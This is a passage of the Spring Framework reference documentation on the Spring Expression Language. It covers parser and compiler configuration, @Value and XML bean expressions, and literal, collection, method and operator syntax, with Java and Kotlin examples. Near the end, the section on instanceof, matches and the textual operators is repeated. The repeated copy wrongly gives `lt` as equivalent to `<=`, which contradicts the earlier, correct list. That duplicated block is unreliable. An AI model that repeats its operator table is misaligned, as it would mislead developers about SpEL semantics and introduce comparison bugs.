that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\");\n\n\t\/\/ b is false\n\tBoolean b = simple.booleanList.get(0);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Simple {\n\t\tvar booleanList: MutableList<Boolean> = ArrayList()\n\t}\n\n\tval simple = Simple()\n\tsimple.booleanList.add(true)\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\")\n\n\t\/\/ b is false\n\tval b = simple.booleanList[0]\n----\n\n\n[[expressions-parser-configuration]]\n=== Parser Configuration\n\nIt is possible to configure the SpEL expression parser by using a parser configuration\nobject (`org.springframework.expression.spel.SpelParserConfiguration`). The configuration\nobject controls the behavior of some of the expression components. For example, if you\nindex into an array or collection and the element at the specified index is `null`, SpEL\ncan automatically create the element. This is useful when using expressions made up of a\nchain of property references. If you index into an array or list and specify an index\nthat is beyond the end of the current size of the array or list, SpEL can automatically\ngrow the array or list to accommodate that index. In order to add an element at the\nspecified index, SpEL will try to create the element using the element type's default\nconstructor before setting the specified value.
If the element type does not have a\ndefault constructor, `null` will be added to the array or list. If there is no built-in\nor custom converter that knows how to set the value, `null` will remain in the array or\nlist at the specified index. The following example demonstrates how to automatically grow\nthe list:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Demo {\n\t\tpublic List<String> list;\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tSpelParserConfiguration config = new SpelParserConfiguration(true,true);\n\n\tExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expression = parser.parseExpression(\"list[3]\");\n\n\tDemo demo = new Demo();\n\n\tObject o = expression.getValue(demo);\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Demo {\n\t\tvar list: List<String>? = null\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tval config = SpelParserConfiguration(true, true)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expression = parser.parseExpression(\"list[3]\")\n\n\tval demo = Demo()\n\n\tval o = expression.getValue(demo)\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n\n\n\n[[expressions-spel-compilation]]\n=== SpEL Compilation\n\nSpring Framework 4.1 includes a basic expression compiler. Expressions are usually\ninterpreted, which provides a lot of dynamic flexibility during evaluation but\ndoes not provide optimum performance. For occasional expression usage,\nthis is fine, but, when used by other components such as Spring Integration,\nperformance can be very important, and there is no real need for the dynamism.\n\nThe SpEL compiler is intended to address this need. During evaluation, the compiler\ngenerates a Java class that embodies the expression behavior at runtime and uses that\nclass to achieve much faster expression evaluation. Due to the lack of typing around\nexpressions, the compiler uses information gathered during the interpreted evaluations\nof an expression when performing compilation. For example, it does not know the type\nof a property reference purely from the expression, but during the first interpreted\nevaluation, it finds out what it is. Of course, basing compilation on such derived\ninformation can cause trouble later if the types of the various expression elements\nchange over time. For this reason, compilation is best suited to expressions whose\ntype information is not going to change on repeated evaluations.\n\nConsider the following basic expression:\n\n----\nsomeArray[0].someProperty.someOtherProperty < 0.1\n----\n\nBecause the preceding expression involves array access, some property de-referencing,\nand numeric operations, the performance gain can be very noticeable. In an example\nmicro benchmark run of 50000 iterations, it took 75ms to evaluate by using the\ninterpreter and only 3ms using the compiled version of the expression.\n\n\n[[expressions-compiler-configuration]]\n==== Compiler Configuration\n\nThe compiler is not turned on by default, but you can turn it on in either of two\ndifferent ways. 
You can turn it on by using the parser configuration process\n(<<expressions-parser-configuration, discussed earlier>>) or by using a system\nproperty when SpEL usage is embedded inside another component. This section\ndiscusses both of these options.\n\nThe compiler can operate in one of three modes, which are captured in the\n`org.springframework.expression.spel.SpelCompilerMode` enum. The modes are as follows:\n\n* `OFF` (default): The compiler is switched off.\n* `IMMEDIATE`: In immediate mode, the expressions are compiled as soon as possible. This\nis typically after the first interpreted evaluation. If the compiled expression fails\n(typically due to a type changing, as described earlier), the caller of the expression\nevaluation receives an exception.\n* `MIXED`: In mixed mode, the expressions silently switch between interpreted and compiled\nmode over time. After some number of interpreted runs, they switch to compiled\nform and, if something goes wrong with the compiled form (such as a type changing, as\ndescribed earlier), the expression automatically switches back to interpreted form\nagain. Sometime later, it may generate another compiled form and switch to it. Basically,\nthe exception that the user gets in `IMMEDIATE` mode is instead handled internally.\n\n`IMMEDIATE` mode exists because `MIXED` mode could cause issues for expressions that\nhave side effects. If a compiled expression blows up after partially succeeding, it\nmay have already done something that has affected the state of the system. If this\nhas happened, the caller may not want it to silently re-run in interpreted mode,\nsince part of the expression may be running twice.\n\nAfter selecting a mode, use the `SpelParserConfiguration` to configure the parser. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tSpelParserConfiguration config = new SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\tthis.getClass().getClassLoader());\n\n\tSpelExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expr = parser.parseExpression(\"payload\");\n\n\tMyMessage message = new MyMessage();\n\n\tObject payload = expr.getValue(message);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval config = SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\t\tthis.javaClass.classLoader)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expr = parser.parseExpression(\"payload\")\n\n\tval message = MyMessage()\n\n\tval payload = expr.getValue(message)\n----\n\nWhen you specify the compiler mode, you can also specify a classloader (passing null is allowed).\nCompiled expressions are defined in a child classloader created under any that is supplied.\nIt is important to ensure that, if a classloader is specified, it can see all the types involved in\nthe expression evaluation process. If you do not specify a classloader, a default classloader is used\n(typically the context classloader for the thread that is running during expression evaluation).\n\nThe second way to configure the compiler is for use when SpEL is embedded inside some other\ncomponent and it may not be possible to configure it through a configuration object. In these\ncases, it is possible to use a system property. You can set the `spring.expression.compiler.mode`\nproperty to one of the `SpelCompilerMode` enum values (`off`, `immediate`, or `mixed`).
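\nFor example, either of the following selects immediate mode (the property name and values are the ones documented above; both forms must take effect before the first parser is created):\n\n[source,java]\n----\n\/\/ As a JVM argument:\n\/\/   java -Dspring.expression.compiler.mode=immediate MyApp\n\n\/\/ Or programmatically, early in application startup:\nSystem.setProperty(\"spring.expression.compiler.mode\", \"immediate\");\n----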
\n\n\n[[expressions-compiler-limitations]]\n==== Compiler Limitations\n\nSince Spring Framework 4.1, the basic compilation framework is in place. However, the framework\ndoes not yet support compiling every kind of expression. The initial focus has been on the\ncommon expressions that are likely to be used in performance-critical contexts. The following\nkinds of expression cannot be compiled at the moment:\n\n* Expressions involving assignment\n* Expressions relying on the conversion service\n* Expressions using custom resolvers or accessors\n* Expressions using selection or projection\n\nMore types of expression will be compilable in the future.\n\n\n\n\n[[expressions-beandef]]\n== Expressions in Bean Definitions\n\nYou can use SpEL expressions with XML-based or annotation-based configuration metadata for\ndefining `BeanDefinition` instances. In both cases, the syntax to define the expression is of the\nform `#{ <expression string> }`.\n\n\n\n[[expressions-beandef-xml-based]]\n=== XML Configuration\n\nA property or constructor argument value can be set by using expressions, as the following\nexample shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nAll beans in the application context are available as predefined variables with their\ncommon bean name. This includes standard context beans such as `environment` (of type\n`org.springframework.core.env.Environment`) as well as `systemProperties` and\n`systemEnvironment` (of type `Map<String, Object>`) for access to the runtime environment.\n\nThe following example shows access to the `systemProperties` bean as a SpEL variable:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"taxCalculator\" class=\"org.spring.samples.TaxCalculator\">\n\t\t<property name=\"defaultLocale\" value=\"#{ systemProperties['user.region'] }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nNote that you do not have to prefix the predefined variable with the `#` symbol here.\n\nYou can also refer to other bean properties by name, as the following example shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n\n\t<bean id=\"shapeGuess\" class=\"org.spring.samples.ShapeGuess\">\n\t\t<property name=\"initialShapeSeed\" value=\"#{ numberGuess.randomNumber }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\n\n\n[[expressions-beandef-annotation-based]]\n=== Annotation Configuration\n\nTo specify a default value, you can place the `@Value` annotation on fields, methods,\nand method or constructor parameters.\n\nThe following example sets the default value of a field variable:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\tpublic class FieldValueTestBean {\n\n\t\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\t\tprivate String defaultLocale;\n\n\t\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\t\tthis.defaultLocale = defaultLocale;\n\t\t\t}\n\n\t\t\tpublic String getDefaultLocale() {\n\t\t\t\treturn
this.defaultLocale;\n\t\t\t}\n\t\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass FieldValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nThe following example shows the equivalent but on a property setter method:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class PropertyValueTestBean {\n\n\t\tprivate String defaultLocale;\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\tpublic String getDefaultLocale() {\n\t\t\treturn this.defaultLocale;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass PropertyValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nAutowired methods and constructors can also use the `@Value` annotation, as the following\nexamples show:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\t\tprivate String defaultLocale;\n\n\t\t@Autowired\n\t\tpublic void configure(MovieFinder movieFinder,\n\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") String defaultLocale) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass SimpleMovieLister {\n\n\t\tprivate lateinit var movieFinder: MovieFinder\n\t\tprivate lateinit var defaultLocale: String\n\n\t\t@Autowired\n\t\tfun configure(movieFinder: MovieFinder,\n\t\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") defaultLocale: String) {\n\t\t\tthis.movieFinder = movieFinder\n\t\t\tthis.defaultLocale = defaultLocale\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate String defaultLocale;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") String defaultLocale) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass MovieRecommender(private val customerPreferenceDao: CustomerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") private val defaultLocale: String) {\n\t\t\/\/ ...\t\n\t}\n----\n\n\n\n\n[[expressions-language-ref]]\n== Language Reference\n\nThis section describes how the Spring Expression Language works. 
It covers the following\ntopics:\n\n* <<expressions-ref-literal>>\n* <<expressions-properties-arrays>>\n* <<expressions-inline-lists>>\n* <<expressions-inline-maps>>\n* <<expressions-array-construction>>\n* <<expressions-methods>>\n* <<expressions-operators>>\n* <<expressions-types>>\n* <<expressions-constructors>>\n* <<expressions-ref-variables>>\n* <<expressions-ref-functions>>\n* <<expressions-bean-references>>\n* <<expressions-operator-ternary>>\n* <<expressions-operator-elvis>>\n* <<expressions-operator-safe-navigation>>\n\n\n\n[[expressions-ref-literal]]\n=== Literal Expressions\n\nThe types of literal expressions supported are strings, numeric values (int, real, hex),\nboolean, and null. Strings are delimited by single quotation marks. To put a single quotation mark itself\nin a string, use two single quotation mark characters.\n\nThe following listing shows simple usage of literals. Typically, they are not used\nin isolation like this but, rather, as part of a more complex expression -- for example,\nusing a literal on one side of a logical comparison operator.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ evals to \"Hello World\"\n\tString helloWorld = (String) parser.parseExpression(\"'Hello World'\").getValue();\n\n\tdouble avogadrosNumber = (Double) parser.parseExpression(\"6.0221415E+23\").getValue();\n\n\t\/\/ evals to 2147483647\n\tint maxValue = (Integer) parser.parseExpression(\"0x7FFFFFFF\").getValue();\n\n\tboolean trueValue = (Boolean) parser.parseExpression(\"true\").getValue();\n\n\tObject nullValue = parser.parseExpression(\"null\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ evals to \"Hello World\"\n\tval helloWorld = parser.parseExpression(\"'Hello World'\").value as String\n\n\tval avogadrosNumber = parser.parseExpression(\"6.0221415E+23\").value as Double\n\n\t\/\/ evals to 2147483647\n\tval maxValue = parser.parseExpression(\"0x7FFFFFFF\").value as Int\n\n\tval trueValue = parser.parseExpression(\"true\").value as Boolean\n\n\tval nullValue = parser.parseExpression(\"null\").value\n----\n\nNumbers support the use of the negative sign, exponential notation, and decimal points.\nBy default, real numbers are parsed by using Double.parseDouble().\n\n\n\n[[expressions-properties-arrays]]\n=== Properties, Arrays, Lists, Maps, and Indexers\n\nNavigating with property references is easy. To do so, use a period to indicate a nested\nproperty value. 
The instances of the `Inventor` class, `pupin` and `tesla`, were populated with\ndata listed in the <<expressions-example-classes, Classes used in the examples>> section.\nTo navigate \"`down`\" and get Tesla's year of birth and Pupin's city of birth, we use the following\nexpressions:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evals to 1856\n\tint year = (Integer) parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context);\n\n\tString city = (String) parser.parseExpression(\"placeOfBirth.City\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evals to 1856\n\tval year = parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context) as Int\n\n\tval city = parser.parseExpression(\"placeOfBirth.City\").getValue(context) as String\n----\n\nCase insensitivity is allowed for the first letter of property names. The contents of\narrays and lists are obtained by using square bracket notation, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tString invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String.class);\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tString name = parser.parseExpression(\"members[0].name\").getValue(\n\t\t\tcontext, ieee, String.class);\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tString invention = parser.parseExpression(\"members[0].inventions[6]\").getValue(\n\t\t\tcontext, ieee, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tval invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String::class.java)\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tval name = parser.parseExpression(\"members[0].name\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tval invention = parser.parseExpression(\"members[0].inventions[6]\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n----\n\nThe contents of maps are obtained by specifying the literal key value within the\nbrackets. 
In the following example, because keys for the `officers` map are strings, we can specify\nstring literals:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Officer's Dictionary\n\n\tInventor pupin = parser.parseExpression(\"officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor.class);\n\n\t\/\/ evaluates to \"Idvor\"\n\tString city = parser.parseExpression(\"officers['president'].placeOfBirth.city\").getValue(\n\t\t\tsocietyContext, String.class);\n\n\t\/\/ setting values\n\tparser.parseExpression(\"officers['advisors'][0].placeOfBirth.country\").setValue(\n\t\t\tsocietyContext, \"Croatia\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Officer's Dictionary\n\n\tval pupin = parser.parseExpression(\"officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor::class.java)\n\n\t\/\/ evaluates to \"Idvor\"\n\tval city = parser.parseExpression(\"officers['president'].placeOfBirth.city\").getValue(\n\t\t\tsocietyContext, String::class.java)\n\n\t\/\/ setting values\n\tparser.parseExpression(\"officers['advisors'][0].placeOfBirth.country\").setValue(\n\t\t\tsocietyContext, \"Croatia\")\n----\n\n\n\n[[expressions-inline-lists]]\n=== Inline Lists\n\nYou can directly express lists in an expression by using `{}` notation.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tList numbers = (List) parser.parseExpression(\"{1,2,3,4}\").getValue(context);\n\n\tList listOfLists = (List) parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tval numbers = parser.parseExpression(\"{1,2,3,4}\").getValue(context) as List<*>\n\n\tval listOfLists = parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context) as List<*>\n----\n\n`{}` by itself means an empty list. For performance reasons, if the list is itself\nentirely composed of fixed literals, a constant list is created to represent the\nexpression (rather than building a new list on each evaluation).\n\n\n\n[[expressions-inline-maps]]\n=== Inline Maps\n\nYou can also directly express maps in an expression by using `{key:value}` notation. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tMap inventorInfo = (Map) parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context);\n\n\tMap mapOfMaps = (Map) parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tval inventorInfo = parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context) as Map<*, *>\n\n\tval mapOfMaps = parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context) as Map<*, *>\t\n----\n\n`{:}` by itself means an empty map. For performance reasons, if the map is itself composed\nof fixed literals or other nested constant structures (lists or maps), a constant map is created\nto represent the expression (rather than building a new map on each evaluation). 
Quoting of the map keys\nis optional. The examples above do not use quoted keys.\n\n\n\n[[expressions-array-construction]]\n=== Array Construction\n\nYou can build arrays by using the familiar Java syntax, optionally supplying an initializer\nto have the array populated at construction time. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tint[] numbers1 = (int[]) parser.parseExpression(\"new int[4]\").getValue(context);\n\n\t\/\/ Array with initializer\n\tint[] numbers2 = (int[]) parser.parseExpression(\"new int[]{1,2,3}\").getValue(context);\n\n\t\/\/ Multi dimensional array\n\tint[][] numbers3 = (int[][]) parser.parseExpression(\"new int[4][5]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval numbers1 = parser.parseExpression(\"new int[4]\").getValue(context) as IntArray\n\n\t\/\/ Array with initializer\n\tval numbers2 = parser.parseExpression(\"new int[]{1,2,3}\").getValue(context) as IntArray\n\n\t\/\/ Multi dimensional array\n\tval numbers3 = parser.parseExpression(\"new int[4][5]\").getValue(context) as Array<IntArray>\n----\n\nYou cannot currently supply an initializer when you construct a\nmulti-dimensional array.\n\n\n\n[[expressions-methods]]\n=== Methods\n\nYou can invoke methods by using typical Java programming syntax. You can also invoke methods\non literals. Variable arguments are also supported. The following examples show how to\ninvoke methods:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tString bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String.class);\n\n\t\/\/ evaluates to true\n\tboolean isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tval bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String::class.java)\n\n\t\/\/ evaluates to true\n\tval isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators]]\n=== Operators\n\nThe Spring Expression Language supports the following kinds of operators:\n\n* <<expressions-operators-relational>>\n* <<expressions-operators-logical>>\n* <<expressions-operators-mathematical>>\n* <<expressions-assignment>>\n\n\n[[expressions-operators-relational]]\n==== Relational Operators\n\nThe relational operators (equal, not equal, less than, less than or equal, greater than,\nand greater than or equal) are supported by using standard operator notation.
The\nfollowing listing shows a few examples of operators:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean::class.java)\n----\n\n[NOTE]\n====\nGreater-than and less-than comparisons against `null` follow a simple rule: `null` is treated as\nnothing (that is, NOT as zero). As a consequence, any other value is always greater\nthan `null` (`X > null` is always `true`) and no other value is ever less than nothing\n(`X < null` is always `false`).\n\nIf you prefer numeric comparisons instead, avoid number-based `null` comparisons\nin favor of comparisons against zero (for example, `X > 0` or `X < 0`).\n====\n\nIn addition to the standard relational operators, SpEL supports the `instanceof` and regular\nexpression-based `matches` operator. The following listing shows examples of both:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n----\n\nCAUTION: Be careful with primitive types, as they are immediately boxed up to the wrapper type,\nso `1 instanceof T(int)` evaluates to `false` while `1 instanceof T(Integer)`\nevaluates to `true`, as expected.\n\nEach symbolic operator can also be specified as a purely alphabetic equivalent. This\navoids problems where the symbols used have special meaning for the document type in\nwhich the expression is embedded (such as in an XML document). The textual equivalents are:\n\n* `lt` (`<`)\n* `gt` (`>`)\n* `le` (`\\<=`)\n* `ge` (`>=`)\n* `eq` (`==`)\n* `ne` (`!=`)\n* `div` (`\/`)\n* `mod` (`%`)\n* `not` (`!`).\n\nAll of the textual operators are case-insensitive.
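\nFor example, the following pairs are equivalent; the textual form is convenient inside XML attributes, where `<` would otherwise need escaping:\n\n[source,java]\n----\n\/\/ evaluates to true, same as \"2 > 1\"\nboolean trueValue = parser.parseExpression(\"2 gt 1\").getValue(Boolean.class);\n\n\/\/ evaluates to false, same as \"1 < -3\"\nboolean falseValue = parser.parseExpression(\"1 lt -3\").getValue(Boolean.class);\n----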
\nIn addition to the standard relational operators, SpEL supports the `instanceof` and regular\nexpression-based `matches` operators. The following listing shows examples of both:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n----\n\nCAUTION: Be careful with primitive types, as they are immediately boxed up to the wrapper type,\nso `1 instanceof T(int)` evaluates to `false`, while `1 instanceof T(Integer)`\nevaluates to `true`, as expected.\n\nEach symbolic operator can also be specified as a purely alphabetic equivalent. This\navoids problems where the symbols used have special meaning for the document type in\nwhich the expression is embedded (such as in an XML document). The textual equivalents are:\n\n* `lt` (`\\<=`)\n* `gt` (`>`)\n* `le` (`\\<=`)\n* `ge` (`>=`)\n* `eq` (`==`)\n* `ne` (`!=`)\n* `div` (`\/`)\n* `mod` (`%`)\n* `not` (`!`)\n\nAll of the textual operators are case-insensitive.\n
